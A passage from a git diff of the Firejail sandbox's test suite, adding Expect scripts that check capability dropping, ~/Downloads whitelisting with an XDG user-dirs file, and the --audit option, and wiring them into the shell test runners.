+        "mknod               - disabled"
+}
+expect {
+        timeout {puts "TESTING ERROR 13\n";exit}
+        "syslog              - disabled"
+}
+after 100
+
+send -- "firejail --debug-caps\r"
+expect {
+        timeout {puts "TESTING ERROR 9\n";exit}
+        "21     - sys_admin"
+}
+expect {
+        timeout {puts "TESTING ERROR 9\n";exit}
+        "22     - sys_boot"
+}
+expect {
+        timeout {puts "TESTING ERROR 9\n";exit}
+        "23     - sys_nice"
+}
+expect {
+        timeout {puts "TESTING ERROR 9\n";exit}
+        "24     - sys_resource"
+}
+after 100
+
+send -- "firejail --caps.keep=\"bla bla bla\"\r"
+expect {
+        timeout {puts "TESTING ERROR 10\n";exit}
+        "capability"
+}
+expect {
+        timeout {puts "TESTING ERROR 11\n";exit}
+        "not found"
+}
+
+after 100
+puts "\nall done\n"
diff --git a/test/filters/caps.exp b/test/filters/caps.exp
index 7f7cf7dd1..2954f2e58 100755
--- a/test/filters/caps.exp
+++ b/test/filters/caps.exp
@@ -12,7 +12,7 @@ expect {
         timeout {puts "TESTING ERROR 1\n";exit}
         "Child process initialized"
 }
-sleep 2
+after 100
 
 send -- "cat /proc/self/status\r"
 expect {
@@ -31,7 +31,7 @@ expect {
         timeout {puts "TESTING ERROR 4\n";exit}
         "Child process initialized"
 }
-sleep 2
+after 100
 
 send -- "cat /proc/self/status\r"
 expect {
@@ -50,7 +50,7 @@ expect {
         timeout {puts "TESTING ERROR 7\n";exit}
         "Child process initialized"
 }
-sleep 2
+after 100
 
 send -- "cat /proc/self/status\r"
 expect {
@@ -66,7 +66,74 @@ expect {
         "Seccomp:"
 }
 send -- "exit\r"
+sleep 1
+
+
+send -- "firejail --profile=caps1.profile --debug\r"
+expect {
+        timeout {puts "TESTING ERROR 11\n";exit}
+        "Drop CAP_SYS_MODULE"
+}
+expect {
+        timeout {puts "TESTING ERROR 12\n";exit}
+        "Drop CAP_SYS_ADMIN"
+}
+expect {
+        timeout {puts "TESTING ERROR 13\n";exit}
+        "Drop CAP_" {puts "TESTING ERROR 14\n";exit}
+        "Child process initialized"
+}
 after 100
+send -- "exit\r"
+sleep 1
 
 
+## tofix: possible problem with caps.keep in profile files
+##send -- "firejail --caps.keep=chown,fowner --noprofile\r"
+#send -- "firejail --profile=caps2.profile\r"
+#expect {
+#       timeout {puts "TESTING ERROR 15\n";exit}
+#       "Child process initialized"
+#}
+#after 100
+#
+#send -- "cat /proc/self/status\r"
+#expect {
+#       timeout {puts "TESTING ERROR 16\n";exit}
+#       "CapBnd:        0000000000000009"
+#}
+#expect {
+#       timeout {puts "TESTING ERROR 17\n";exit}
+#       "Seccomp:"
+#}
+#send -- "exit\r"
+#sleep 1
+
+#send -- "firejail --caps.drop=chown,dac_override,dac_read_search,fowner --noprofile\r"
+send -- "firejail --profile=caps3.profile\r"
+expect {
+        timeout {puts "TESTING ERROR 18\n";exit}
+        "Child process initialized"
+}
+after 100
+
+send -- "cat /proc/self/status\r"
+expect {
+        timeout {puts "TESTING ERROR 19\n";exit}
+        "CapBnd:"
+}
+expect {
+        timeout {puts "TESTING ERROR 20\n";exit}
+        "fffffff0"
+}
+expect {
+        timeout {puts "TESTING ERROR 21\n";exit}
+        "Seccomp:"
+}
+send -- "exit\r"
+sleep 1
+
+
+
+after 100
 puts "\nall done\n"
diff --git a/test/filters/caps1.profile b/test/filters/caps1.profile
new file mode 100644
index 000000000..8b0c3b340
--- /dev/null
+++ b/test/filters/caps1.profile
@@ -0,0 +1 @@
+caps
diff --git a/test/filters/caps2.profile b/test/filters/caps2.profile
new file mode 100644
index 000000000..4f0016fad
--- /dev/null
+++ b/test/filters/caps2.profile
@@ -0,0 +1 @@
+caps.drop chown,dac_override,dac_read_search,fowner
\ No newline at end of file
diff --git a/test/filters/caps3.profile b/test/filters/caps3.profile
new file mode 100644
index 000000000..4f0016fad
--- /dev/null
+++ b/test/filters/caps3.profile
@@ -0,0 +1 @@
+caps.drop chown,dac_override,dac_read_search,fowner
\ No newline at end of file
diff --git a/test/filters/filters.sh b/test/filters/filters.sh
index 5c7c98b3e..fea4a0296 100755
--- a/test/filters/filters.sh
+++ b/test/filters/filters.sh
@@ -12,6 +12,9 @@ echo "TESTING: noroot (test/filters/noroot.exp)"
 echo "TESTING: capabilities (test/filters/caps.exp)"
 ./caps.exp
 
+echo "TESTING: capabilities print (test/filters/caps-print.exp)"
+./caps-print.exp
+
 rm -f seccomp-test-file
 if [ "$(uname -m)" = "x86_64" ]; then
        echo "TESTING: fseccomp (test/filters/fseccomp.exp)"
diff --git a/test/fs/fs.sh b/test/fs/fs.sh
index 1c5473f79..d9a425661 100755
--- a/test/fs/fs.sh
+++ b/test/fs/fs.sh
@@ -61,6 +61,9 @@ echo "TESTING: whitelist empty (test/fs/whitelist-empty.exp)"
 echo "TESTING: private whitelist (test/fs/private-whitelist.exp)"
 ./private-whitelist.exp
 
+echo "TESTING: whitelist ~/Downloads (test/fs/whitelist-downloads.exp)"
+./whitelist-downloads.exp
+
 echo "TESTING: invalid filename (test/fs/invalid_filename.exp)"
 ./invalid_filename.exp
 
diff --git a/test/fs/user-dirs.dirs b/test/fs/user-dirs.dirs
new file mode 100644
index 000000000..0d19da4e4
--- /dev/null
+++ b/test/fs/user-dirs.dirs
@@ -0,0 +1,15 @@
+# This file is written by xdg-user-dirs-update
+# If you want to change or add directories, just edit the line you're
+# interested in. All local changes will be retained on the next run
+# Format is XDG_xxx_DIR="$HOME/yyy", where yyy is a shell-escaped
+# homedir-relative path, or XDG_xxx_DIR="/yyy", where /yyy is an
+# absolute path. No other format is supported.
+# 
+XDG_DESKTOP_DIR="$HOME/Desktop"
+XDG_DOWNLOAD_DIR="$HOME/Downloads"
+XDG_TEMPLATES_DIR="$HOME/Templates"
+XDG_PUBLICSHARE_DIR="$HOME/Public"
+XDG_DOCUMENTS_DIR="$HOME/Documents"
+XDG_MUSIC_DIR="$HOME/Music"
+XDG_PICTURES_DIR="$HOME/Pictures"
+XDG_VIDEOS_DIR="$HOME/Videos"
diff --git a/test/fs/whitelist-downloads.exp b/test/fs/whitelist-downloads.exp
new file mode 100755
index 000000000..6af318d2b
--- /dev/null
+++ b/test/fs/whitelist-downloads.exp
@@ -0,0 +1,49 @@
+#!/usr/bin/expect -f
+# This file is part of Firejail project
+# Copyright (C) 2014-2016 Firejail Authors
+# License GPL v2
+
+set timeout 10
+spawn $env(SHELL)
+match_max 100000
+
+send -- "cp user-dirs.dirs /tmp/.\r"
+after 100
+
+send -- "firejail --private --noprofile\r"
+expect {
+        timeout {puts "TESTING ERROR 0\n";exit}
+        "Child process initialized"
+}
+after 100
+
+send -- "firejail --force --profile=/etc/firejail/firefox.profile\r"
+expect {
+        timeout {puts "TESTING ERROR 1\n";exit}
+        "cannot whitelist Downloads directory"
+}
+expect {
+        timeout {puts "TESTING ERROR 2\n";exit}
+        "Child process initialized"
+}
+after 100
+
+send -- "exit\r"
+after 100
+
+send -- "cp /tmp/user-dirs.dirs ~/.config/.\r"
+after 100
+
+send -- "firejail --force --profile=/etc/firejail/firefox.profile\r"
+expect {
+        timeout {puts "TESTING ERROR 3\n";exit}
+        "cannot whitelist Downloads directory"
+}
+expect {
+        timeout {puts "TESTING ERROR 4\n";exit}
+        "Child process initialized"
+}
+after 100
+
+puts "\nall done\n"
+
diff --git a/test/utils/audit.exp b/test/utils/audit.exp
new file mode 100755
index 000000000..931b46981
--- /dev/null
+++ b/test/utils/audit.exp
@@ -0,0 +1,79 @@
+#!/usr/bin/expect -f
+# This file is part of Firejail project
+# Copyright (C) 2014-2016 Firejail Authors
+# License GPL v2
+
+set timeout 10
+spawn $env(SHELL)
+match_max 100000
+
+send -- "firejail --audit\r"
+expect {
+        timeout {puts "TESTING ERROR 0\n";exit}
+        "Firejail Audit"
+}
+expect {
+        timeout {puts "TESTING ERROR 1\n";exit}
+        "is running in a PID namespace"
+}
+expect {
+        timeout {puts "TESTING ERROR 2\n";exit}
+        "container/sandbox firejail"
+}
+expect {
+        timeout {puts "TESTING ERROR 3\n";exit}
+        "seccomp BPF enabled"
+}
+expect {
+        timeout {puts "TESTING ERROR 4\n";exit}
+        "all capabilities are disabled"
+}
+expect {
+        timeout {puts "TESTING ERROR 5\n";exit}
+        "dev directory seems to be fully populated"
+}
+after 100
+
+
+send -- "firejail --audit=/usr/lib/firejail/faudit\r"
+expect {
+        timeout {puts "TESTING ERROR 6\n";exit}
+        "Firejail Audit"
+}
+expect {
+        timeout {puts "TESTING ERROR 7\n";exit}
+        "is running in a PID namespace"
+}
+expect {
+        timeout {puts "TESTING ERROR 8\n";exit}
+        "container/sandbox firejail"
+}
+expect {
+        timeout {puts "TESTING ERROR 9\n";exit}
+        "seccomp BPF enabled"
+}
+expect {
+        timeout {puts "TESTING ERROR 10\n";exit}
+        "all capabilities are disabled"
+}
+expect {
+        timeout {puts "TESTING ERROR 11\n";exit}
+        "dev directory seems to be fully populated"
+}
+after 100
+
+send -- "firejail --audit=blablabla\r"
+expect {
+        timeout {puts "TESTING ERROR 12\n";exit}
+        "cannot find the audit program"
+}
+after 100
+
+send -- "firejail --audit=\r"
+expect {
+        timeout {puts "TESTING ERROR 12\n";exit}
+        "invalid audit program"
+}
+after 100
+
+puts "\nall done\n"
diff --git a/test/utils/utils.sh b/test/utils/utils.sh
index 804e5ae0f..04702597f 100755
--- a/test/utils/utils.sh
+++ b/test/utils/utils.sh
@@ -6,6 +6,9 @@
 export MALLOC_CHECK_=3
 export MALLOC_PERTURB_=$(($RANDOM % 255 + 1))
 
+echo "TESTING: audit (test/utils/audit.exp)"
+./audit.exp
+
 echo "TESTING: version (test/utils/version.exp)"
 ./version.exp